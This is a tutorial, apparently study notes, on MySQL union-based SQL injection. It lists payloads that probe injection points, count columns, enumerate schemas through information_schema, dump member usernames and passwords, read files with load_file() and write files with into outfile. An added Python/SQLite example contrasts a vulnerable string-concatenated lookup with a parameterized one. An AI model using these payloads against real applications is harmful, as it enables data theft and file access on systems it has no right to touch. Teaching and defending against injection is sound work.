SQL injection: command execution
The member table is as follows:
Query the database version, database name, user name, and operating system:
select * from member where id=-1 union select version(),database(),user(),@@version_compile_os;
Determining the injection point: true/false (error) queries
select * from member where id=1 and 1=1;
select * from member where id=1 and 1=2;
group_concat query
Concatenates the queried values into one string, for example:
select group_concat(username,pw) from member where id=1;
limit query
limit 0,1 returns the first row; limit 1,1 returns the second row; limit 1,2 starts at the second row and shows two rows.
As shown in the figure below:
order by: finding the number of columns
When the number given to order by is less than the number of columns of the queried object, the query succeeds; when it is greater, an error is returned, as shown in the figure below:
union query
Query the database name. The number of columns here must match the first queried object (in the example, the number of columns in member), otherwise the query errors:
select * from member where id=1 union select database(),1,2;
select * from member where id=1 union select database(),1,2,3;
select * from member where id=-1 union select database(),1,2,3;
The result shows that the current database name is mysql.
Querying database names
In MySQL 5.0 and above there is an information_schema database, which records all database names, table names, and column names.
select * from member where id=-1 union select group_concat(schema_name),2,3,4 from information_schema.schemata;
Query the table names in the mysql database:
select * from member where id=-1 union select table_name,1,2,3 from information_schema.tables where table_schema='mysql';
select * from member where id=-1 union select table_name,1,2,3 from information_schema.tables where table_schema=database();
select * from member where id=-1 union select group_concat(table_name),1,2,3 from information_schema.tables where table_schema='mysql';
Error: wrong number of columns
Query the column names of a table. The two queries below select only 2 columns while member has 4, so they fail with the column-count error; they need the same ,2,3,4 padding as the queries above.
select * from member where id=-1 union select group_concat(column_name),2 from information_schema.columns where table_name='goods_tb';
select * from member where id=-1 union select group_concat(column_name),2 from information_schema.columns where table_name='member';
Query the actual data:
select * from member where id=-1 union select id,username,pw,sex from member;
Querying another database from the current database
For example, the current database is mysql and you want to query the table city in another database, world:
select * from world.city;
load_file(): file-read function
select * from member where id=-1 union select load_file('d:/text.txt'),2,3,4;
into outfile or into dumpfile: file-export functions. Both load_file() and into outfile/dumpfile require the MySQL FILE privilege and are restricted by the secure_file_priv setting, which is why hardening guides disable or confine them.
select 'x' into outfile 'd:/filename.txt';
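Every union query above only works because the id value is pasted into the SQL text. The following added example (not part of the original notes) rebuilds the member table in an in-memory SQLite database and contrasts the string-concatenated lookup that lets the page's "id=-1 union select id,username,pw,sex from member" payload dump the table with a hardened lookup that validates the id and binds it as a parameter; the table rows are constructed sample data.

```python
import sqlite3

# Constructed stand-in for the page's member table (id, username, pw, sex).
def build_db():
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE member (id INTEGER, username TEXT, pw TEXT, sex TEXT);
        INSERT INTO member VALUES (1, 'alice', 'pw1', 'f');
        INSERT INTO member VALUES (2, 'bob',   'pw2', 'm');
    """)
    return conn

def lookup_concat(conn, user_input):
    # Vulnerable: the untrusted value becomes part of the SQL text, so a
    # "-1 union select ..." value rewrites the statement and returns every row.
    sql = "SELECT * FROM member WHERE id=" + user_input
    return conn.execute(sql).fetchall()

def lookup_param(conn, user_input):
    # Hardened, two layers:
    # 1) the id must parse as a plain integer, so any SQL fragment is rejected;
    try:
        member_id = int(user_input)
    except ValueError:
        return []
    # 2) the value is bound through a placeholder, never spliced into the SQL
    #    text, so even a non-numeric value could only ever be compared, not run.
    return conn.execute("SELECT * FROM member WHERE id=?", (member_id,)).fetchall()

if __name__ == "__main__":
    db = build_db()
    payload = "-1 union select id,username,pw,sex from member"
    print("concat, normal id :", lookup_concat(db, "1"))
    print("concat, payload   :", lookup_concat(db, payload))   # dumps both rows
    print("param,  normal id :", lookup_param(db, "1"))
    print("param,  payload   :", lookup_param(db, payload))    # []
```

The same contrast holds for MySQL: the defence is the placeholder binding (and input validation), not any filtering of the words union or select.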